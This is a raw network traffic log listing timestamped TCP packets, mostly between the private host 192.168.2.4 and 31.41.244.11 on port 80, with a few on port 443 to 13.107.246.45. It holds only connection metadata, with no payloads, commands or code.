Nov 5, 2024 18:46:10.803036928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803056002 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803066969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803081989 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803100109 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803122044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803134918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803174973 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803241014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803251982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803263903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803276062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803287983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803294897 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803308010 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803319931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803329945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803332090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803354979 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803395033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803425074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803435087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803446054 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803466082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803466082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803487062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803498030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803498030 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803514957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803524971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803530931 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803535938 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803541899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803550959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803560972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803564072 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803574085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803596020 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803610086 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803683043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803694010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803725958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803730965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803739071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803750038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803777933 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803788900 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803807974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803819895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803848982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803857088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803859949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803870916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.803896904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803905964 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.803991079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.804008007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.804018021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.804034948 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.804045916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.807977915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.807992935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.808000088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.808048010 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.808136940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.808151960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.808157921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.808283091 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.808290005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.808300972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.808312893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.808331966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.808334112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.808343887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.808355093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.808360100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.808372021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.808376074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.808413029 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.808420897 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.808434963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.808448076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.808458090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.808479071 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.808502913 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.809246063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.809264898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.809274912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.809298038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.809314966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.809324980 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.809326887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.809340000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.809350014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.809355021 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.809361935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.809365034 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.809381962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.809410095 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.809602022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.809612989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.809623957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.809648037 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.809675932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.810375929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.810398102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.810408115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.810427904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.810439110 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.810487986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.810499907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.810511112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.810523987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.810528040 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.810545921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.810590029 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.810621977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.810641050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.810652971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.810663939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.810663939 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.810677052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.810684919 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.810687065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.810698986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.810707092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.810710907 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.810723066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.810755014 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.811686993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.811712027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.811724901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.811734915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.811738968 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.811753035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.811760902 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.811789036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.811814070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.811860085 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.812227964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.812239885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.812251091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.812278032 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.812300920 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.813306093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.813325882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.813338995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.813349962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.813361883 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.813446045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.813457012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.813467979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.813494921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.813508987 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.814243078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.814273119 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.814282894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.814291000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.814307928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.814322948 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.814332008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.814343929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.814353943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.814376116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.814399004 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.814933062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.814954042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.814965010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.814976931 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.815005064 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.815047026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.815058947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.815068960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.815090895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.815108061 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.815109968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.815120935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.815141916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.815149069 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.815157890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.815176010 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.815920115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.815932035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.815942049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.815963984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.815992117 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.816669941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.816718102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.816719055 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.816729069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.816761971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.817267895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.817280054 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.817291021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.817306995 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.817337036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.818368912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818381071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818381071 CET	443	49823	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.818398952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818413019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818413973 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.818425894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818454027 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.818461895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.818483114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818494081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818505049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818515062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818530083 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.818540096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818540096 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.818551064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818561077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818564892 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.818572998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818584919 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.818615913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818617105 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.818634033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818645954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818656921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818666935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818676949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.818685055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818686008 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.818696022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818707943 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.818734884 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.818787098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818798065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818809032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818820000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818847895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.818847895 CET	49823	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.818859100 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.818864107 CET	443	49823	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.818867922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818878889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818890095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818902016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.818917036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.818922043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.818945885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.818979025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819034100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819052935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819080114 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.819096088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819103956 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.819108009 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819119930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819143057 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.819171906 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.819242001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819256067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819267035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819284916 CET	49823	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.819288969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.819295883 CET	443	49823	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.819299936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819309950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819328070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819330931 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.819338083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819350004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819351912 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.819360018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819371939 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.819389105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819396019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.819401026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819411993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819438934 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.819446087 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.819466114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819478989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819489002 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819506884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819511890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.819544077 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.819559097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819569111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819578886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819591045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819601059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.819605112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.819619894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.819642067 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820077896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820090055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820102930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820125103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820152044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820168018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820179939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820190907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820204973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820214033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820218086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820231915 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820265055 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820285082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820297003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820307970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820318937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820328951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820331097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820343018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820353031 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820354939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820363998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820374012 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820399046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820410013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820424080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820465088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820497036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820508957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820519924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820533037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820539951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820544958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820554972 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820586920 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820624113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820636034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820650101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820662975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820674896 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820679903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820683956 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820691109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820702076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820715904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820725918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820729017 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.820736885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820746899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.820753098 CET	49804	80	192.168.2.4	31.41.244.11
